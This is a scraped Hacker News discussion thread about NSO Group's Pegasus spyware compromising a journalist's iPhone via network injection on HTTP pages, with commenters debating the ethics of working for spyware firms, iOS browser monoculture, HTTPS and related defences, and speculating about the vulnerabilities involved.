I think the developer community need to start ostracising people working for these companies. Don't hire former employees, don't hang hang out with people who work for these companies and conferences.
Don't supply services to these companies (build their website, network...).
I believe by letting people of the hook for participating in this (similar things can be said for e.g. the NSA) we are essentially endorsing the behaviour. If you work on at e.g. NSO group, you are personally responsible for governments surpressing and even killing (just look at SA) critics
Ostracising someone from society solely on where they work without looking at their actual actions is implying guilt by association. A tactic often used by authoritarians. Everyone in a civilised society has the right to a fair trial without the presumption of guilt.
I was recently offered a job by NSO, didn't take it due to their terrible reputation. I won't be surprised if some countries start denying entry to NSO employees. Even Facebook suspended accounts of NSO employees after NSO hacked Whatsapp - https://www.vice.com/en_us/article/7x5nnz/nso-employees-take... .
On the other hand, their product is just a tool which can be used for good (stopping terrorists) or evil (spying on human rights activists). Just like a kitchen knife can be used for good (cooking a meal) or evil (stabbing people). So I find it hard to find the moral justification for the actions you suggest. The problem is not the tool or the tool's manufacturer, it's how it gets used.
This won't work, as long as there is a market for hacking phones, there will be those willing to sell their expertise.
We should focus on making things more secure. While security is a tough problem, it's also somewhat surprising that properly sandboxing a browser is so difficult.
I agree that people supporting this are guilty, but I don't agree with blacklists of developers for political reasons. These are established in the industry and speaks of incompetence in leadership as it is. That doesn't mean their behavior should be endorsed, but that is a case for legislation.
I really don't like NSO, to the point I never go to their parties and meetups even when invited and they have good parties.
However it's worth mentioning they really don't see it that way. A lot of people working for NSO (or the NSA) see themselves as making a personal sacrifice for public safety.
Also, NSO doesn't operate said technology it just sells it - so it's a bit more like going after people making anti DRM software or p2p sharing software. The only big difference is that NSO is making money.
I do agree that individuals should be held accountable for their work but it's the degree of the work that is problematic. Is it direct contribution or is it indirect contribution?
If I am working on an open source project used by NSA to hack you, am I responsible? No. That type of moral policing would be bad.
If someone is writing software directly for hacking you, then yes they are responsible but then you must consider all the actions of the org where they used that tool. People might work on these tools because of terrorism or believe in security of the state. That's by no means bad but how the org go about that can be bad and infringe rights. They don't have control over it. Now if they don't quit over the bad reuse of their tool and are not constraint by something (a person working for NSA is likely to get another job without problem), then I think there's something to be said about the personal responsibility.
Verifying the degree of contribution from outside is very hard to do as most details of what happens inside the orgs remains a secret. What their employees are told is wildly different than what they end up doing.
That said, I don't believe targeting individuals will have much effect. It's actively bad because there's an easy road here. Hold the org accountable. If we go down the path of wasting energy on ex-communicating individuals, orgs may get a free pass. It's not hard to replace people in a big org especially a monopoly. Go for the low hanging fruits. Boycott the org.
I think the developer community need to start refusing to use the cellphone. It cannot be trusted. It's tainted by non-free software on top of non-free OS on top of non-free firmware with the separate processor whose behaviour we cannot observe from the main processor. It also relies on central wireless network from only a handful of providers. Easy single point of vulnerable target.
I do refuse to own a cellphone. What about you. Since you're suggesting the boycott, can you?
The Citizen Lab reports (one linked from this article) about the Israeli NSO Group's Pegasus spyware have been really scary for a few years now already.
Here's a category of articles on the citizenlab.ca web site described as "Investigations into the prevalence and impact of digital espionage operations against civil society groups": https://citizenlab.ca/category/research/targeted-threats/
I saw this discussed on reddit, and I was surprised that there was so much confusion about how this happened. It wasn't just "network injection" - quite clearly (unfortunately very poorly described in the article) there was a vulnerability in iOS/Safari that allowed remote code execution; network injection alone wouldn't have been enough. Does anyone know what the CVE was that allowed this?
A code execution vulnerability isn't enough. To work on truly any website, they need:
- A remote code execution vulnerability. There are almost certainly multiple vulnerabilities at play here, since long gone are the days where a single vuln gave arbitrary code execution.
- a way to bypass the encryption/https, unless the remote code execution was on a layer before encryption (which seems unlikely). EDIT: Apparently the hack only works on non-encrypted websites.
- Once remote code is achieved, they most certainly need a way to elevate privileges in order to make the hack more persistent and tap into other apps.
There are most likely several CVEs at play here. The amount of effort that went into this hack is, frankly, terrifying.
Too bad I can't run a different browser engine on iOS. In a monoculture everyone is exposed to the same vulnerabilities. If we had 3 or 4 browser engines running on iOS then the odds of a specific vulnerability affecting a single user go down.
Further, there is competition for having the most secure browser. it's not controversial to say the 12 years ago IE, Firefox and Safari were pretty bad at security and Chrome in 2008 pushed them all to up their game.
Apple's stance on browser engines is at best claiming security by obscurity. Either apps are sandboxed or they aren't. If they are then it would be safe to run any browser engine. If they aren't then having only one means users have no choice when that one fails.
Also, does iOS have something similar to SELinux? I know it's not perfect, and there have been RCEs in Android as well. But I'm surprised there are still things out there like the original tiff jailbreak exploit that allows full root access to a person's device from just visiting a webpage.
>Does anyone know what the CVE was that allowed this?
>The malicious code even wipes crash logs, making it impossible to determine exactly what weaknesses were exploited to take over the phone, said Claudio Guarnieri, head of Amnesty International’s Security Lab, in an interview.
Thanks for clarifying. I honestly thought, how is the browser able to install spyware that "allows remote access to everything on the phone" (per the article), as the browser is supposed to be a sandboxed environment. I'm relieved it was "just" a vulnerability in iOS.
On HN I've seen a lot of unencrypted sites lately. I don't personally feel comfortable browsing on them, so I avoid them. Near the end of the article here, it mentions that this is only possible on an unencrypted website. Is there a reason why so many people are not encrypting their websites? Even browsers seem to have picked up on the insecure nature of http. Please correct me if I'm wrong here, I just find it very strange how many links I've inspected only to see a lack of TLS/SSL.
Ok, so I want to make something clear to the (smart but mostly not "in-the-know" about NSO) HN crowd.
Let's say you're a Mexican drug lord or Saudi prince. You know this tech exists and the US/Israeli/European governments use it.
Then, you see this article, and see all the comments in the comment section about how competent, scary and balance-changing the technology is.
Basically: I think these pieces are bought for and paid by NSO through a PR firm, but you are not the target. When we leave comments like "NSO's tech is so good it has to be regulated!" or "NSO's tech is dangerous!" we are playing directly into the PR firm's clever hands.
It's like an article about how good the AR-15 or the F-35 are. Obviously to me (and most of the readers) it's mostly "why are we focusing on technology of death" but we are not the target.
Why aren't cell phone tower communications secured? Why aren't cell towers secured with certificates verified by the network? Why aren't stingray devices considered an attack on the cell network?
If stingray devices work by tricking your phone to connect with older protocols like 3G, why aren't those protocols deprecated just like we deprecate older encryption methods that are no longer secure?
I'm probably naive here because I'm not versed in networks -- but couldn't he avoid surveillance by using a VPN? Wasn't one of the design features of VPNs that your connection can't be hijacked?
The article mentions NSO's Pegasus that the journalist victim downloaded, and presumably installed surveillance tools on his iPhone. What is Pegasus? Is it platform of browser zero days that then installs surveillance tools? Does it root kit the phone?
> the Israeli company issued a policy that vowed the company would cut off clients if they were found to misuse the surveillance technology to target journalists and human rights activists
This goes right up there with "the backdoor for which only we'll have the key".
Would using something like Opera Mini have prevented this attack from happening?
I’m imagining a proxy like tool that lets high exposure individuals to request webpages, have them downloaded/parsed, and possibly rendered before handing them off to the client device.
Perhaps it would let the client download https normally but switch modes for any http requests (if I understand what happened here correctly.)
I feel like this article makes the technique sound a lot more novel/surprising than it is. It seems like a simple case of "phone had an RCE vulnerability that got exploited by an attacker in control of the network".
Time for everyone to install HTTPS Everywhere and turn on Encrypt All Sites Eligible (EASE) on desktop.
On mobile, highly recommend using a browser that supports extensions or pressuring companies to enable third party browsers. It's not overstating it to say that our legislators should compel that competition, it's a national security issue that journalists, intelligence officials, and the President using devices by a certain manufacturer cannot change the browser or use helpful extensions like HTTPS Everywhere.
[+] [-] cycomanic|5 years ago|reply
Don't supply services to these companies (build their website, network...).
I believe by letting people of the hook for participating in this (similar things can be said for e.g. the NSA) we are essentially endorsing the behaviour. If you work on at e.g. NSO group, you are personally responsible for governments surpressing and even killing (just look at SA) critics
[+] [-] aronpye|5 years ago|reply
[+] [-] ishi|5 years ago|reply
On the other hand, their product is just a tool which can be used for good (stopping terrorists) or evil (spying on human rights activists). Just like a kitchen knife can be used for good (cooking a meal) or evil (stabbing people). So I find it hard to find the moral justification for the actions you suggest. The problem is not the tool or the tool's manufacturer, it's how it gets used.
[+] [-] aeternum|5 years ago|reply
We should focus on making things more secure. While security is a tough problem, it's also somewhat surprising that properly sandboxing a browser is so difficult.
[+] [-] raxxorrax|5 years ago|reply
[+] [-] malux85|5 years ago|reply
Couple that with compliance being driven by ethics and non-compliance being driven by money - it will never work.
We should focus on increasing security
[+] [-] inglor|5 years ago|reply
However it's worth mentioning they really don't see it that way. A lot of people working for NSO (or the NSA) see themselves as making a personal sacrifice for public safety.
Also, NSO doesn't operate said technology it just sells it - so it's a bit more like going after people making anti DRM software or p2p sharing software. The only big difference is that NSO is making money.
[+] [-] driverdan|5 years ago|reply
If you work for a company like NSO you are willingly complicit in violations of human rights. That's not the kind of person I want to work with.
[+] [-] searchableguy|5 years ago|reply
I do agree that individuals should be held accountable for their work but it's the degree of the work that is problematic. Is it direct contribution or is it indirect contribution?
If I am working on an open source project used by NSA to hack you, am I responsible? No. That type of moral policing would be bad.
If someone is writing software directly for hacking you, then yes they are responsible but then you must consider all the actions of the org where they used that tool. People might work on these tools because of terrorism or believe in security of the state. That's by no means bad but how the org go about that can be bad and infringe rights. They don't have control over it. Now if they don't quit over the bad reuse of their tool and are not constraint by something (a person working for NSA is likely to get another job without problem), then I think there's something to be said about the personal responsibility.
Verifying the degree of contribution from outside is very hard to do as most details of what happens inside the orgs remains a secret. What their employees are told is wildly different than what they end up doing.
That said, I don't believe targeting individuals will have much effect. It's actively bad because there's an easy road here. Hold the org accountable. If we go down the path of wasting energy on ex-communicating individuals, orgs may get a free pass. It's not hard to replace people in a big org especially a monopoly. Go for the low hanging fruits. Boycott the org.
[+] [-] peroporque|5 years ago|reply
[+] [-] jlg23|5 years ago|reply
[+] [-] mam2|5 years ago|reply
[+] [-] closeparen|5 years ago|reply
[+] [-] ezoe|5 years ago|reply
I do refuse to own a cellphone. What about you. Since you're suggesting the boycott, can you?
[+] [-] nsajko|5 years ago|reply
This is a frightening 8-part series about the abuse of "Pegasus" in Mexico 2017-2019: https://citizenlab.ca/2017/02/bittersweet-nso-mexico-spyware...
Here's a category of articles on the citizenlab.ca web site described as "Investigations into the prevalence and impact of digital espionage operations against civil society groups": https://citizenlab.ca/category/research/targeted-threats/
[+] [-] fortran77|5 years ago|reply
[+] [-] hn_throwaway_99|5 years ago|reply
[+] [-] roblabla|5 years ago|reply
- A remote code execution vulnerability. There are almost certainly multiple vulnerabilities at play here, since long gone are the days where a single vuln gave arbitrary code execution.
- a way to bypass the encryption/https, unless the remote code execution was on a layer before encryption (which seems unlikely). EDIT: Apparently the hack only works on non-encrypted websites.
- Once remote code is achieved, they most certainly need a way to elevate privileges in order to make the hack more persistent and tap into other apps.
There are most likely several CVEs at play here. The amount of effort that went into this hack is, frankly, terrifying.
[+] [-] greggman3|5 years ago|reply
Further, there is competition for having the most secure browser. it's not controversial to say the 12 years ago IE, Firefox and Safari were pretty bad at security and Chrome in 2008 pushed them all to up their game.
Apple's stance on browser engines is at best claiming security by obscurity. Either apps are sandboxed or they aren't. If they are then it would be safe to run any browser engine. If they aren't then having only one means users have no choice when that one fails.
[+] [-] VWWHFSfQ|5 years ago|reply
[+] [-] nsajko|5 years ago|reply
[+] [-] Thorrez|5 years ago|reply
>The malicious code even wipes crash logs, making it impossible to determine exactly what weaknesses were exploited to take over the phone, said Claudio Guarnieri, head of Amnesty International’s Security Lab, in an interview.
[+] [-] yoran|5 years ago|reply
[+] [-] logicNSci|5 years ago|reply
I want to post this Everytime someone claims Apple is best for security. We need logic to fight marketing.
[+] [-] christofosho|5 years ago|reply
[+] [-] inglor|5 years ago|reply
Let's say you're a Mexican drug lord or Saudi prince. You know this tech exists and the US/Israeli/European governments use it.
Then, you see this article, and see all the comments in the comment section about how competent, scary and balance-changing the technology is.
Basically: I think these pieces are bought for and paid by NSO through a PR firm, but you are not the target. When we leave comments like "NSO's tech is so good it has to be regulated!" or "NSO's tech is dangerous!" we are playing directly into the PR firm's clever hands.
It's like an article about how good the AR-15 or the F-35 are. Obviously to me (and most of the readers) it's mostly "why are we focusing on technology of death" but we are not the target.
[+] [-] kavalg|5 years ago|reply
[+] [-] oars|5 years ago|reply
[+] [-] bvinc|5 years ago|reply
If stingray devices work by tricking your phone to connect with older protocols like 3G, why aren't those protocols deprecated just like we deprecate older encryption methods that are no longer secure?
[+] [-] shbooms|5 years ago|reply
The author directly contradicts the headline used here:
> The website must use “clear text” which means the URL starts with “http” not “https.”
[+] [-] maerF0x0|5 years ago|reply
https://rietta.com/blog/comcast-insecure-injection/
https://news.ycombinator.com/item?id=21389657
[+] [-] modeless|5 years ago|reply
[+] [-] pdimitar|5 years ago|reply
[+] [-] rediguanayum|5 years ago|reply
[+] [-] close04|5 years ago|reply
This goes right up there with "the backdoor for which only we'll have the key".
[+] [-] oska|5 years ago|reply
[+] [-] atommclain|5 years ago|reply
I’m imagining a proxy like tool that lets high exposure individuals to request webpages, have them downloaded/parsed, and possibly rendered before handing them off to the client device.
Perhaps it would let the client download https normally but switch modes for any http requests (if I understand what happened here correctly.)
[+] [-] unknown|5 years ago|reply
[deleted]
[+] [-] josephcsible|5 years ago|reply
[+] [-] ezoe|5 years ago|reply
If you were properly trained for, you should have already realized that cellphone is not trustworthy way of communication.
[+] [-] AaronFriel|5 years ago|reply
On mobile, highly recommend using a browser that supports extensions or pressuring companies to enable third party browsers. It's not overstating it to say that our legislators should compel that competition, it's a national security issue that journalists, intelligence officials, and the President using devices by a certain manufacturer cannot change the browser or use helpful extensions like HTTPS Everywhere.
https://www.eff.org/deeplinks/2018/12/how-https-everywhere-k...
[+] [-] unknown|5 years ago|reply
[deleted]
[+] [-] sdan|5 years ago|reply